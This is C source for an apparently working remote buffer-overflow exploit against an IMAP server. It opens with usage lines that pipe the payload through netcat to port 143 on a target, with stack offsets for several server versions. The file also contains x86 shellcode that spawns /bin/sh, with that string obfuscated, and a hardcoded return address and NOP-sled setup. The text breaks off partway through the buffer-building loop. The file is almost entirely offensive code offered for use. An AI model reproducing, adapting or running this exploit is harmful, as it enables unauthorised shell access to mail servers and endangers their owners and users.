/*----------imap3---------------------------------------------- (./imap3 -1000;cat )|./nc ip 143 10.233 = -1000 (./imap3 -500;cat )|./nc ip 143 10.205 = -500 (./imap3 0;cat)|./nc ip 143 10.203 = 0 (./imap3 0;cat)|./nc ip 143 10.196 = 0 (./imap3 0;cat)|./nc ip 143 10.190 = 0 (./imap3 -1000;cat )|./nc ip 143 10.166 = -1000 (./imap3 -1500;cat )|./nc ip 143 9.0 = -1500/-1000 --------------------------------------------------------------*/ #include #include #define OFFSET 0 #define RET_POSITION 1032 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x38" /* jmp 0x38 */ "\x5e" /* popl %esi */ "\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */ "\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */ "\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */ "\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */ "\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */ "\x89\xf0" /* movl %esi,%eax */ "\x83\xc0\x08" /* addl $0x8,%eax */ "\x89\x46\x08" /* movl %eax,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %eax,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* inc %eax */ "\xcd\x80" /* int $0x80 */ "\xe8\xc3\xff\xff\xff" /* call -0x3d */ "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */ /* /bin/sh is disguised */ void main(int argc,char **argv) { char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; if(argc>1) offset=atoi(argv[1]); sp=0xbffff29f; addr=sp-offset; ptr=buff; addr_ptr=(long*)ptr; for(i=0;i